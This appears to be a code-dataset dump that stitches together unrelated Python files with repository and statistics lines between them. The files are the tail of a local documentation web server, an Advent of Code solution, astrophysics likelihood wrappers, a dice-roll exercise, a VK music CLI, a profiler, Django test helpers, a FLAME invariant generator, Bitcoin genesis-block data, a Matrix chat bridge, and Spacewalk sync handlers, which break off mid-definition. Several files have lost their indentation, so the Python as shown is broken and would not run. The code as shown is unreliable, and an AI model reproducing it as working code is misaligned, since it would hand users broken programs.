body +='<ul>'
index = 0
            for k,v in sorted(recent.items(),key=lambda x:x[1][1],reverse=True):
size = float(getFileSize(v[0]))/1024
if index == RECENT_NUM:
break
v[0] =v[0].replace(DOCUMENT_ROOT+'/','')
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[%s , %.1f KB]</a></li>
'''%(v[0],k,v[0],k,size)
index +=1
body +='</ul>'
body += "<h2>Directories:</h2>"
if len(dirs)>0:
body +='<ul>'
for k,v in dirs.items():
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[%s,dir]</a></li>
'''%(k,k,v,k)
body +='</ul>'
body += "<h2>ReST documents:</h2>"
if len(rest)>0:
body +='<ul>'
for k,v in rest.items():
size = float(getFileSize(v))/1024
v=v.replace(DOCUMENT_ROOT+'/','')
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[ %s , %.1f KB]</a></li>
'''%(v,k,v,k,size)
body +='</ul>'
body += "<h2>Other files:</h2>"
if len(others)>0:
body +='<ul>'
for k,v in others.items():
size = float(getFileSize(v))/1024
v=v.replace(DOCUMENT_ROOT,'')
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[%s , %.1f KB]</a></li>
'''%(k,k,v,k,size)
body +='</ul>'
header_html = self.header_html(req,req)
footer_html = self.footer_html()
return header_html+body+footer_html
def find(self,path,query):
"""
        Search every file under DOCUMENT_ROOT for the query string.
        Each match is stored in a dict keyed by file name, with the file
        path as the value; the dict is returned when the search finishes.
"""
found = dict()
for root,dirs,files in os.walk(DOCUMENT_ROOT):
for fl in files:
for line in codecs.open(root+'/'+fl,'r','utf-8'):
                    if line.find(query.decode('utf-8')) != -1:
                        found[fl]=root+'/'+fl
                        break
return found
def recent_files(self):
recent ={}
for root,dirs,files in os.walk(DOCUMENT_ROOT):
for file in files:
if not isMatchedFile(self.ignoreobj,file):
                    mtime = os.stat(root+'/'+file).st_mtime
recent[file]=[root+'/'+file,mtime]
return recent
def directory_files(self,path):
dirs =dict()
rest = dict()
others = dict()
df = os.listdir(path)
for item in df:
if os.path.isdir(path+"/"+item):
dirs[item]=path+"/"+item
if os.path.isfile(path+"/"+item):
if isMatchedFile(self.restpatobj,item):
rest[item]=path+'/'+item
else:
if not isMatchedFile(self.ignoreobj,item):
others[item]= path+'/'+item
return dirs,rest,others
def abspath(path):
return os.path.abspath(path)
def getFileSize(file):
return os.path.getsize(file)
def isMatchedFile(patobj,filename):
"""
    Return True if filename matches patobj, False otherwise.
>>> pat = re.compile(".(rst|rest|txt)$")
>>> isMatchedFile(pat,"test.rst")
True
>>> isMatchedFile(pat,"test.doc")
False
>>> pattern = re.compile("TAGS")
>>> isMatchedFile(pattern,"DS_STORE")
False
>>> isMatchedFile(pattern,"TAGS")
True
"""
match = patobj.search(filename)
return False if (match == None) else True
def command():
server = bts.HTTPServer(('localhost', PORT), GetHandler)
print 'Starting server'
server.serve_forever()
if __name__ == '__main__':
command()
| bsd-3-clause | -6,843,100,928,478,583,000 | 26.029545 | 117 | 0.524426 | false | 3.012411 | false | false | false |
hubbardgary/AdventOfCode | day01.py | 1 | 2209 | # --- Day 1: Not Quite Lisp ---
#
# Santa was hoping for a white Christmas, but his weather machine's "snow" function is powered by stars, and he's fresh
# out! To save Christmas, he needs you to collect fifty stars by December 25th.
#
# Collect stars by helping Santa solve puzzles. Two puzzles will be made available on each day in the advent calendar;
# the second puzzle is unlocked when you complete the first. Each puzzle grants one star. Good luck!
#
# Here's an easy puzzle to warm you up.
#
# Santa is trying to deliver presents in a large apartment building, but he can't find the right floor - the directions
# he got are a little confusing. He starts on the ground floor (floor 0) and then follows the instructions one
# character at a time.
#
# An opening parenthesis, (, means he should go up one floor, and a closing parenthesis, ), means he should go down
# one floor.
#
# The apartment building is very tall, and the basement is very deep; he will never find the top or bottom floors.
#
# For example:
#
# (()) and ()() both result in floor 0.
# ((( and (()(()( both result in floor 3.
# ))((((( also results in floor 3.
# ()) and ))( both result in floor -1 (the first basement level).
# ))) and )())()) both result in floor -3.
# To what floor do the instructions take Santa?
#
#
#
# --- Part Two ---
#
# Now, given the same instructions, find the position of the first character that causes him to enter the basement
# (floor -1). The first character in the instructions has position 1, the second character has position 2, and so on.
#
# For example:
#
# ) causes him to enter the basement at character position 1.
# ()()) causes him to enter the basement at character position 5.
# What is the position of the character that causes Santa to first enter the basement?
instructions = open("day01_input").read()
# Part 1
floor_no = instructions.count('(') - instructions.count(')')
print("Santa ends up on floor {0}".format(floor_no))
# Part 2
floor_no = 0
for n, i in enumerate(instructions):
floor_no += 1 if i == '(' else -1
if floor_no == -1:
print("Santa enters basement at instruction {0}".format(n + 1)) # Add 1 because the instructions are 1-based
break
| mit | -5,081,958,315,049,967,000 | 39.907407 | 119 | 0.70077 | false | 3.545746 | false | false | false |
vhaasteren/piccard | piccard/hmcwrappers.py | 1 | 3004 | #!/usr/bin/env python
# encoding: utf-8
# vim: tabstop=4:softtabstop=4:shiftwidth=4:expandtab
from __future__ import division, print_function
import numpy as np
import math
import scipy.linalg as sl, scipy.special as ss
from functools import partial
from transformations import *
from stingrays import *
from fullstingray import *
def hmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the full stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=fullStingrayLikelihood,
**kwargs)
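# Typical call (sketch; the file names here are placeholders):
#   likob = hmcLikelihood(h5filename='data.h5', jsonfilename='pars.json')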
def hpHmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=hpStingrayLikelihood,
**kwargs)
def tmHmcLikelihood1(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=tmStingrayLikelihood,
**kwargs)
def tmHmcLikelihood2(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=tmStingrayLikelihood2,
**kwargs)
def muHmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=muStingrayLikelihood,
**kwargs)
def msHmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=msStingrayLikelihood,
**kwargs)
| gpl-3.0 | 4,308,661,855,888,951,300 | 33.136364 | 84 | 0.712383 | false | 4.248939 | false | false | false |
arantebillywilson/python-snippets | py2/htp/ch04/fig04_07.py | 2 | 1226 | #!/usr/bin/python
#
# fig04_07.py
# Roll a six-sided die 6000 times.
#
# Author: Billy Wilson Arante
# Created: 2016/08/06 PHT
#
# Attribution: Python How to Program, 1st Ed. by Deitel & Deitel
#
import random
def main():
"""Main"""
# Initialize
frequency1 = 0
frequency2 = 0
frequency3 = 0
frequency4 = 0
frequency5 = 0
frequency6 = 0
for roll in range(1, 6001): # Rolls a die 6000 times
        face = random.randrange(1, 7)  # random integer from 1 to 6
# Count frequencies
if face == 1:
frequency1 += 1
elif face == 2:
frequency2 += 1
elif face == 3:
frequency3 += 1
elif face == 4:
frequency4 += 1
elif face == 5:
frequency5 += 1
elif face == 6:
frequency6 += 1
else:
print "It should never get here!"
print "%4s %13s" % ("Face", "Frequency")
print "%4s %13s" % (1, frequency1)
print "%4s %13s" % (2, frequency2)
print "%4s %13s" % (3, frequency3)
print "%4s %13s" % (4, frequency4)
print "%4s %13s" % (5, frequency5)
print "%4s %13s" % (6, frequency6)
if __name__ == "__main__":
main()
| mit | 8,852,127,518,474,271,000 | 20.892857 | 71 | 0.520392 | false | 3.260638 | false | false | false |
kardapoltsev/vkdownloader | vk.py | 1 | 2091 | #!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
# Copyright 2013 Alexey Kardapoltsev
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json, sys, os
from vkdownloader import VkDownloader
def process_music(args):
if args.action == "load":
vk.load(args.user, args.dest, args.clean)
elif args.action == "list":
vk.show(args.user)
elif args.action == "play":
vk.play(args.user)
else:
print("unknown action")
def process_friends(args):
if args.action == "list":
vk.show_friends(args.user)
else:
print("unknown action")
topParser = argparse.ArgumentParser()
topParser.add_argument("-u", "--user", help = "user id")
subParsers = topParser.add_subparsers(title = "Command categories")
music = subParsers.add_parser("music", description = "working with music")
friends = subParsers.add_parser("friends", description = "working with friends")
friends.add_argument("action", help = "friends actions", choices=["list"])
friends.set_defaults(func = process_friends)
music.add_argument("action", help = "music actions", choices=["list", "load", "play"])
music.add_argument("-d", "--dest", help = "destination directory for music download, default is current dir")
music.add_argument("-c", "--clean", dest='clean', action='store_true', help = "with this options destination directory will be cleaned")
music.set_defaults(clean = False)
music.set_defaults(func = process_music)
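# Example invocations of the CLI configured above (sketch):
#   ./vk.py -u <user_id> music list
#   ./vk.py -u <user_id> music load -d ~/Music --clean
#   ./vk.py -u <user_id> friends list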
try:
import argcomplete
argcomplete.autocomplete(topParser)
except ImportError:
pass
args = topParser.parse_args()
vk = VkDownloader()
args.func(args)
| apache-2.0 | 8,169,627,644,131,124,000 | 31.671875 | 136 | 0.725968 | false | 3.556122 | false | false | false |
yadt/yadt-config-rpm-maker | src/config_rpm_maker/utilities/profiler.py | 1 | 4724 | # yadt-config-rpm-maker
# Copyright (C) 2011-2013 Immobilien Scout GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module contains functions which were created for performance
tweaking. The test coverage of this module is low since it's main
purpose is to add logging information.
"""
from functools import wraps
from logging import getLogger
from time import time
from os import walk
from os.path import join, getsize
from config_rpm_maker.configuration import get_thread_count
LOGGER = getLogger(__name__)
LOG_EACH_MEASUREMENT = False
_execution_time_summary = {}
def measure_execution_time(original_function):
def process_measurement(elapsed_time_in_seconds, args, kwargs):
arguments = ', '.join([str(arg) for arg in args[1:]])
key_word_arguments = ""
if kwargs:
key_word_arguments = ", " + str(kwargs)
if len(args) > 0:
function_name = "%s.%s" % (args[0].__class__.__name__, original_function.__name__)
else:
function_name = original_function.__name__
if function_name not in _execution_time_summary.keys():
_execution_time_summary[function_name] = [elapsed_time_in_seconds, 1]
else:
_execution_time_summary[function_name][0] += elapsed_time_in_seconds
_execution_time_summary[function_name][1] += 1
if LOG_EACH_MEASUREMENT:
function_call = '%s(%s%s)' % (function_name, arguments, key_word_arguments)
LOGGER.debug('Took %.2fs to perform %s', elapsed_time_in_seconds, function_call)
@wraps(original_function)
def wrapped_function(*args, **kwargs):
start_time = time()
return_value_from_function = original_function(*args, **kwargs)
end_time = time()
elapsed_time_in_seconds = end_time - start_time
process_measurement(elapsed_time_in_seconds, args, kwargs)
return return_value_from_function
return wrapped_function
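# Example (sketch): decorating a function records its runtime under the key
# "ClassName.method" (or the bare function name) in _execution_time_summary.
#
#   @measure_execution_time
#   def build_config_rpm(revision):    # hypothetical function
#       ...
#
#   log_execution_time_summaries(LOGGER.info)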
def log_execution_time_summaries(logging_function):
logging_function('Execution times summary (keep in mind thread_count was set to %s):', get_thread_count())
for function_name in sorted(_execution_time_summary.keys()):
summary_of_function = _execution_time_summary[function_name]
elapsed_time = summary_of_function[0]
average_time = summary_of_function[0] / summary_of_function[1]
logging_function(' %5s times with average %5.2fs = sum %7.2fs : %s',
summary_of_function[1], average_time, elapsed_time, function_name)
def log_directories_summary(logging_function, start_path):
directories_summary = {}
directories = walk(start_path).next()[1]
absolute_count_of_files = 0
absolute_total_size = 0
for file_name in walk(start_path).next()[2]:
file_path = join(start_path, file_name)
file_size = getsize(file_path)
absolute_total_size += file_size
absolute_count_of_files += 1
directories_summary[start_path] = (absolute_count_of_files, absolute_total_size)
for directory in directories:
total_size = 0
count_of_files = 0
directory_path = join(start_path, directory)
for dirpath, dirnames, filenames in walk(directory_path):
for file_name in filenames:
file_path = join(dirpath, file_name)
file_size = getsize(file_path)
total_size += file_size
absolute_total_size += file_size
count_of_files += 1
absolute_count_of_files += 1
directories_summary[directory_path] = (count_of_files, total_size)
logging_function('Found %d files in directory "%s" with a total size of %d bytes', absolute_count_of_files, start_path, absolute_total_size)
for directory in sorted(directories_summary.keys()):
count_of_files = directories_summary[directory][0]
total_size = directories_summary[directory][1]
logging_function(' %5d files with total size of %10d bytes in directory "%s"', count_of_files, total_size, directory)
| gpl-3.0 | 8,090,430,440,642,751,000 | 36.492063 | 144 | 0.657494 | false | 3.834416 | false | false | false |
Ilias95/guitarchords | chords/tests/helper_functions.py | 1 | 1234 | from chords.models import Artist, Song, User
def create_artist(name='Some Artist'):
artist = Artist(name=name)
artist.save()
return artist
def create_song(title='Random Song', artist=None, sender=None, published=True,
tabs=False, genre=None):
song = Song(title=title, artist=artist, sender=sender, tabs=tabs)
if published:
song.publish()
if genre is not None:
song.genre = genre
song.save()
return song
def create_user(username='username', password='password'):
user = User.objects.create_user(username=username, password=password)
user.save()
return user
def valid_song_data(title='Title', artist_txt='artist_txt', user_txt='user_txt',
genre=Song.POP, video='http://www.example.com', tabs=True,
content='content'):
return {
'title' : title, 'artist_txt' : artist_txt, 'user_txt' : user_txt,
'genre' : genre, 'video' : video, 'tabs' : tabs, 'content' : content
}
def valid_contact_data(name='Name', email='example@example.com',
subject='Subject', body='Message'):
return {
'name' : name, 'email' : email,
'subject': subject, 'body' : body
}
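# Typical use inside a test case (sketch):
#   song = create_song(artist=create_artist(), sender=create_user())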
| mit | -31,426,872,652,309,664 | 32.351351 | 80 | 0.60778 | false | 3.618768 | false | false | false |
IgnitionProject/ignition | demo/dsl/flame/iterative/CG_inv_generator.py | 1 | 3186 | """Demonstrates how to generate loop invariants from a single PME
In this example, we define the conjugate gradient PME and use it to generate
invariant operators. These operators can then be passed to the flame generator
functions to generate worksheets or algorithms.
"""
from itertools import chain, combinations
import numpy as np
from ignition.dsl.flame import CONSTANTS, iterative_arg, PObj, T, TensorExpr
class InvariantGenerator( object ):
"""Abstract class for generating invariants from PME's.
To use this class, subclass it and create an args tuple and PME.
"""
def _get_tuple_args(self, obj):
ret = obj
if isinstance(obj, (PObj, list)):
ret = []
obj_list = list(obj)
for item in obj_list:
ret.append(self._get_tuple_args(item))
ret = tuple(ret)
elif isinstance(obj, TensorExpr):
if obj in CONSTANTS:
# We throw away constants since they don't need a new name
ret = "_"
else:
ret = obj
else:
raise ValueError("Unable to handle obj %s of type %s" % \
(str(obj), type(obj)))
return ret
def _get_signature(self, fname):
return "def %(fname)s(%(fargs)s):" % \
{'fname': fname,
'fargs': ", ".join(map(lambda o: str(self._get_tuple_args(o)),
self.args)).replace("'", ""),
}
def _get_body(self, inv):
return " return " + str(inv)
def __iter__(self):
size = len(self.PME)
for n, comb in enumerate(chain(*[combinations(range(size), i) \
for i in xrange(1, size+1)])):
invs = [self.PME[idx] for idx in comb]
code = self._get_signature(self.name+"_"+str(n))
code += '\n'
code += self._get_body( invs )
yield code
class CGInvariantGenerator( InvariantGenerator ):
A = iterative_arg("A", rank=2, part_suffix="1x1")
X = iterative_arg("X", rank=2, part_suffix="1x3", arg_src="Overwrite")
P = iterative_arg("P", rank=2, part_suffix="1x3", arg_src="Computed")
I = iterative_arg("I", rank=2, part_suffix="I_3x3", arg_src="Computed")
U = iterative_arg("U", rank=2, part_suffix="Upper_Bidiag_3x3", arg_src="Computed")
J = iterative_arg("J", rank=2, part_suffix="J_3x3", arg_src="Computed")
D = iterative_arg("D", rank=2, part_suffix="Diag_3x3", arg_src="Computed")
R = iterative_arg("R", rank=2, part_suffix="1x3", arg_src="Computed")
O = iterative_arg("O", rank=2, part_suffix="1x3", arg_src="Computed")
args = [A, X, P, I, U, J, D, R, O]
#Putting this here until I get PObjs combining better
for arg in args:
exec('%(name)s = np.matrix(%(name)s.part)' % {'name': arg.obj.name})
PME = [X * (I + U) - P * D,
A * P * D - R * (I - U),
P * (I - J) - R,
T(R) * R - O]
name = 'cg_inv'
if __name__ == "__main__":
with open("cg_inv.py", 'w') as fp:
for code in CGInvariantGenerator():
fp.write(code+"\n\n")
| bsd-3-clause | -2,550,230,135,679,058,000 | 35.204545 | 86 | 0.548023 | false | 3.375 | false | false | false |
kokjo/pycoin | genesisblock.py | 1 | 1579 | import msgs
blkmsg = msgs.Blockmsg.fromjson({"type": "block", "txs": [{"inputs": [{"script": "04ffff001d0104455468652054696d65732030332f4a616e2f32303039204368616e63656c6c6f72206f6e206272696e6b206f66207365636f6e64206261696c6f757420666f722062616e6b73", "outpoint": {"index": 4294967295, "tx": "0000000000000000000000000000000000000000000000000000000000000000"}, "sequence": 4294967295}], "locktime": 0, "version": 1, "outputs": [{"amount": 5000000000, "script": "4104678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5fac"}]}], "block": {"nonce": 2083236893, "version": 1, "time": 1231006505, "merkle": "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127b7afdeda33b", "bits": 0x1d00ffff, "prev": "0000000000000000000000000000000000000000000000000000000000000000"}})
hash = blkmsg.block.hash
blkdata = "".join([
"010000000000000000000000000000000000000000000000000000000000000000000000",
"3ba3edfd7a7b12b27ac72c3e67768f617fc81bc3888a51323a9fb8aa4b1e5e4a29ab5f49",
"ffff001d1dac2b7c01010000000100000000000000000000000000000000000000000000",
"00000000000000000000ffffffff4d04ffff001d0104455468652054696d65732030332f",
"4a616e2f32303039204368616e63656c6c6f72206f6e206272696e6b206f66207365636f",
"6e64206261696c6f757420666f722062616e6b73ffffffff0100f2052a01000000434104",
"678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f",
"4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5fac00000000"])
blkmsg = msgs.Blockmsg.frombinary(blkdata.decode("hex"))[0]
hash = blkmsg.block.hash
| unlicense | 9,101,266,588,675,411,000 | 91.882353 | 830 | 0.860671 | false | 2.471049 | false | true | false |
tuna/fishroom | fishroom/matrix.py | 2 | 7312 | #!/usr/bin/env python3
from matrix_client.client import MatrixClient
from matrix_client.api import MatrixRequestError
from requests.exceptions import MissingSchema
from .bus import MessageBus, MsgDirection
from .base import BaseBotInstance, EmptyBot
from .models import Message, ChannelType, MessageType
from .helpers import get_now_date_time, get_logger
from .config import config
import sys
import re
logger = get_logger("Matrix")
class MatrixHandle(BaseBotInstance):
ChanTag = ChannelType.Matrix
SupportMultiline = True
def __init__(self, server, username, password, rooms, nick=None):
client = MatrixClient(server)
self.viewer_url = server.strip('/') + "/_matrix/media/v1/download/"
try:
client.login_with_password(username, password)
except MatrixRequestError as e:
if e.code == 403:
logger.error("403 Bad username or password.")
sys.exit(4)
else:
logger.error("{} Check your server details are correct.".format(e))
sys.exit(2)
except MissingSchema as e:
logger.error("{} Bad URL format.".format(e))
sys.exit(3)
self.username = client.user_id
logger.info("logged in as: {}".format(self.username))
if nick is not None:
u = client.get_user(client.user_id)
logger.info("Setting display name to {}".format(nick))
try:
u.set_display_name(nick)
except MatrixRequestError as e:
logger.error("Fail to set display name: error = {}".format(e))
self.joined_rooms = {}
self.room_id_to_alias = {}
self.displaynames = {}
for room_id_alias in rooms:
try:
room = client.join_room(room_id_alias)
except MatrixRequestError as e:
if e.code == 400:
logger.error("400 Room ID/Alias in the wrong format")
sys.exit(11)
else:
logger.error("{} Couldn't find room {}".format(e, room_id_alias))
sys.exit(12)
logger.info("Joined room {}".format(room_id_alias))
self.joined_rooms[room_id_alias] = room
self.room_id_to_alias[room.room_id] = room_id_alias
room.add_listener(self.on_message)
self.client = client
self.bot_msg_pattern = config['matrix'].get('bot_msg_pattern', None)
def on_message(self, room, event):
if event['sender'] == self.username:
return
logger.info("event received, type: {}".format(event['type']))
if event['type'] == "m.room.member":
if event['content']['membership'] == "join":
logger.info("{0} joined".format(event['content']['displayname']))
elif event['type'] == "m.room.message":
sender = event['sender']
opt = {'matrix': sender}
if sender not in self.displaynames.keys():
u_send = self.client.get_user(sender)
self.displaynames[sender] = u_send.get_display_name()
sender = self.displaynames[sender]
msgtype = event['content']['msgtype']
room_alias = self.room_id_to_alias[room.room_id]
date, time = get_now_date_time()
mtype = None
media_url = None
typedict = {
"m.image": MessageType.Photo,
"m.audio": MessageType.Audio,
"m.video": MessageType.Video,
"m.file": MessageType.File
}
if msgtype == "m.text" or msgtype == "m.notice":
mtype = MessageType.Text
msg_content = event['content']['body']
elif msgtype == "m.emote":
mtype = MessageType.Text
msg_content = "*{}* {}".format(sender, event['content']['body'])
elif msgtype in ["m.image", "m.audio", "m.video", "m.file"]:
new_url = event['content']['url'].replace("mxc://", self.viewer_url)
mtype = typedict[msgtype]
msg_content = "{} ({})\n{}".format(new_url, mtype, event['content']['body'])
media_url = new_url
else:
pass
logger.info("[{}] {}: {}".format(room_alias, sender, event['content']['body']))
if mtype is not None:
msg = Message(
ChannelType.Matrix,
sender, room_alias, msg_content,
mtype=mtype, date=date, time=time,
media_url=media_url, opt=opt)
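            # send_to_bus is monkey-patched onto the instance as a plain
            # function (see Matrix2FishroomThread), hence the explicit self.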
self.send_to_bus(self, msg)
def send_to_bus(self, msg):
raise NotImplementedError()
def listen_message_stream(self):
self.client.start_listener_thread()
def send_msg(self, target, content, sender=None, first=False, **kwargs):
target_room = self.joined_rooms[target]
if self.bot_msg_pattern is not None and re.match(self.bot_msg_pattern, content) is not None:
target_room.send_text("{} sent the following message:".format(sender))
target_room.send_text(content)
else:
target_room.send_text("[{}] {}".format(sender, content))
def Matrix2FishroomThread(mx: MatrixHandle, bus: MessageBus):
if mx is None or isinstance(mx, EmptyBot):
return
def send_to_bus(self, msg):
bus.publish(msg)
mx.send_to_bus = send_to_bus
mx.listen_message_stream()
def Fishroom2MatrixThread(mx: MatrixHandle, bus: MessageBus):
if mx is None or isinstance(mx, EmptyBot):
return
for msg in bus.message_stream():
mx.forward_msg_from_fishroom(msg)
def init():
from .db import get_redis
redis_client = get_redis()
im2fish_bus = MessageBus(redis_client, MsgDirection.im2fish)
fish2im_bus = MessageBus(redis_client, MsgDirection.fish2im)
rooms = [b["matrix"] for _, b in config['bindings'].items() if "matrix" in b]
server = config['matrix']['server']
user = config['matrix']['user']
password = config['matrix']['password']
nick = config['matrix'].get('nick', None)
return (
MatrixHandle(server, user, password, rooms, nick),
im2fish_bus, fish2im_bus,
)
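# The config this module reads might look like (sketch; the keys are taken
# from the lookups above, the values are placeholders):
#
#   matrix:
#     server: "https://matrix.example.org"
#     user: "@fishroom:example.org"
#     password: "..."
#     nick: "fishroom"
#     bot_msg_pattern: "^\\.\\w+"
#   bindings:
#     tuna:
#       matrix: "#tuna:example.org"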
def main():
if "matrix" not in config:
return
from .runner import run_threads
bot, im2fish_bus, fish2im_bus = init()
run_threads([
(Matrix2FishroomThread, (bot, im2fish_bus, ), ),
(Fishroom2MatrixThread, (bot, fish2im_bus, ), ),
])
def test():
rooms = [b["matrix"] for _, b in config['bindings'].items()]
server = config['matrix']['server']
user = config['matrix']['user']
password = config['matrix']['password']
matrix_handle = MatrixHandle(server, user, password, rooms)
def send_to_bus(self, msg):
logger.info(msg.dumps())
matrix_handle.send_to_bus = send_to_bus
matrix_handle.process(block=True)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--test", default=False, action="store_true")
args = parser.parse_args()
if args.test:
test()
else:
main()
# vim: ts=4 sw=4 sts=4 expandtab
| gpl-3.0 | 8,994,990,554,163,678,000 | 34.495146 | 100 | 0.569748 | false | 3.876988 | true | false | false |
ogajduse/spacewalk | backend/satellite_tools/sync_handlers.py | 10 | 18900 | #
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import sys
import string # pylint: disable=W0402
from spacewalk.common import usix
from spacewalk.server.importlib import channelImport, packageImport, errataImport, \
kickstartImport
from spacewalk.common.usix import raise_with_tb
import diskImportLib
import xmlSource
import syncCache
import syncLib
DEFAULT_ORG = 1
# Singleton-like
class BaseCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._items = []
self._cache = None
self._items_hash = {}
self._init_fields()
self._init_cache()
def add_item(self, item):
item_id = self._get_item_id(item)
timestamp = self._get_item_timestamp(item)
self._cache.cache_set(item_id, item, timestamp=timestamp)
return self
def get_item_timestamp(self, item_id):
"Returns this item's timestamp"
if item_id not in self._items_hash:
raise KeyError("Item %s not found in collection" % item_id)
return self._items_hash[item_id]
def get_item(self, item_id, timestamp):
"Retrieve an item from the collection"
return self._cache.cache_get(item_id, timestamp=timestamp)
def has_item(self, item_id, timestamp):
"""Return true if the item exists in the collection (with the
specified timestamp"""
return self._cache.cache_has_key(item_id, timestamp=timestamp)
def _init_fields(self):
return self
def _init_cache(self):
return self
def _get_item_id(self, item):
"Get the item ID out of an item. Override in subclasses"
raise NotImplementedError
def _get_item_timestamp(self, item):
"Get the item timestamp out of an item. Override in subclasses"
raise NotImplementedError
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
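# A subclass supplies the cache and item identity, e.g. (sketch;
# SomePayloadCache is hypothetical):
#
#   class MyCollection(BaseCollection):
#       def _init_cache(self):
#           self._cache = syncCache.SomePayloadCache()
#       def _get_item_id(self, item):
#           return item['label']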
# Singleton-like
class ChannelCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._channels = []
self._parent_channels = {}
self._channels_hash = {}
self._cache = syncCache.ChannelCache()
def add_item(self, channel_object):
"""Stores a channel in the collection"""
channel_label = channel_object['label']
channel_last_modified = channel_object['last_modified']
last_modified = _to_timestamp(channel_last_modified)
self._cache.cache_set(channel_label, channel_object,
timestamp=last_modified)
t = (channel_label, last_modified)
self._channels.append(t)
channel_parent = channel_object.get('parent_channel')
if channel_parent is not None:
# Add this channel to the parent's list
l = self._get_list_from_dict(self._parent_channels, channel_parent)
l.append(t)
else:
# Create an empty list
self._get_list_from_dict(self._parent_channels, channel_label)
self._channels_hash[channel_label] = last_modified
return self
@staticmethod
def _get_list_from_dict(diction, key):
# Returns the dictionary's key if present (assumed to be a list), or
# sets the value to an empty list and returns it
if key in diction:
l = diction[key]
else:
l = diction[key] = []
return l
def get_channel_labels(self):
"""Return the channel labels from this collection"""
return [x[0] for x in self._channels]
def get_channels(self):
"""Return a list of (channel label, channel timestamp) from this
collection"""
return self._channels[:]
def get_channel(self, channel_label, timestamp):
"""Return the channel with the specified label and timestamp from the
collection"""
return self._cache.cache_get(channel_label, timestamp=timestamp)
def get_channel_timestamp(self, channel_label):
"""Returns the channel's timestamp"""
if channel_label not in self._channels_hash:
raise KeyError("Channel %s could not be found" % channel_label)
return self._channels_hash[channel_label]
def get_parent_channel_labels(self):
"""Return a list of channel labels for parent channels"""
l = list(self._parent_channels.keys())
l.sort()
return l
def get_child_channels(self, channel_label):
"""Return a list of (channel label, channel timestamp) for this parent
channel"""
if channel_label not in self._parent_channels:
raise Exception("Channel %s is not a parent" % channel_label)
return self._parent_channels[channel_label]
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
# pylint: disable=W0232
class SyncHandlerContainer:
collection = object
    # This class intentionally has no __init__: it is used in multiple
    # inheritance, and subclasses should use the __init__ from the other
    # base class.
def endItemCallback(self):
# reference to xmlSource superclass we redefines
xml_superclass = self.__class__.__bases__[1]
xml_superclass.endItemCallback(self)
# pylint: disable=E1101
if not self.batch:
return
c = self.collection()
c.add_item(self.batch[-1])
del self.batch[:]
def endContainerCallback(self):
# Not much to do here...
pass
def get_sync_handler(container):
